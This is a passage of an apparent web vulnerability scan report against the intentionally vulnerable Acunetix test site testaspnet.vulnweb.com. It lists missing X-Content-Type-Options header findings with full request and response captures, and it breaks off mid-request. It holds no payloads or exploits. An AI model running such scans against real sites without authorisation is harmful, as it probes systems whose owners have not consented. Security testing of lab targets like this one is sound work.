value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc+mKdRBm3AUE" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/styles.css
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/styles.css HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Thu, 29 May 2008 14:36:50 GMT Accept-Ranges: bytes ETag: "c8c2136e99c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2597
Response Body - size: 2,597 bytes.	body { padding-right: 0px; padding-left: 0px; list-style-position: outside; background: url(images/background.gif) #e6dccf fixed repeat-y center top; padding-bottom: 0px; margin: 0px; font: small tahoma, "Bitstream Vera Sans" , "Trebuchet MS" , "Lucida Grande" , lucida, helvetica, sans-serif; padding-top: 0px; list-style-type: square; } A.menu { padding-right: 10px; padding-left: 10px; color: #806640; text-decoration: none; background-color: #e6dccf; } A.menu:hover { padding-right: 10px; padding-left: 10px; color: #e6dccf; text-decoration: none; background-color: #BF8630; } A.NewsOperation { font-size: xx-small; margin-left: 5px; color: #BF8630; margin-right: 5px; text-decoration: none; } A.NewsOperation:hover { font-size: xx-small; margin-left: 5px; color: #E6B873; margin-right: 5px; text-decoration: none; } .Framed { border: #E6DCCF 1px solid; } .FramedForm { border-right: #806640 1px solid; border-top: #806640 1px solid; border-left: #806640 1px solid; border-bottom: #806640 1px solid; background-color: #e6dccf; } .MenuBar { border-top: #806640 1px solid; border-bottom: #806640 1px solid; background-color: #e6dccf; } .Calendar { border-right: #e6b873 1px solid; border-top: #e6b873 1px solid; border-left: #e6b873 1px solid; border-bottom: #e6b873 1px solid; } INPUT { border: #806640 1px solid; } INPUT.classic { border: none; } TEXTAREA { border: #807940 1px solid; } INPUT.PostNews { border: #807940 1px solid; width: 500px; } INPUT.Login { border: #807940 1px solid; width: 250px; } TEXTAREA.PostNews { border: #807940 1px solid; width: 500px; height: 300px; } TEXTAREA.CommentTA { border: #807940 1px solid; width: 450px; height: 100px; } .NewsDate { border-top: #e6b873 2px solid; font-size: xx-small; border-bottom: #e6b873 1px solid; } .NewsTitle { font-weight: bolder; margin-bottom: 5px; text-transform: capitalize; padding-top: 2px; } .NewsShort { padding-left: 5px; margin-bottom: 10px; } .NewsLong { padding-left: 5px; margin-bottom: 10px; border-bottom: #e6b873 1px solid; } .CommentText { margin-top: 10px; margin-bottom: 5px; } .CommentAuthor { font-size: xx-small; margin-bottom: 10px; } .Comment { clear: both; border-right: #806640 1px solid; padding-right: 5px; padding-left: 5px; float: none; padding-bottom: 5px; border-left: #806640 1px solid; width: 500px; padding-top: 5px; } .Calendar { border: solid 1px #E6B873; }
URL	http://testaspnet.vulnweb.com/about.aspx
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 404 bytes.	POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/about.aspx Content-Length: 981 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 981 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 593 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
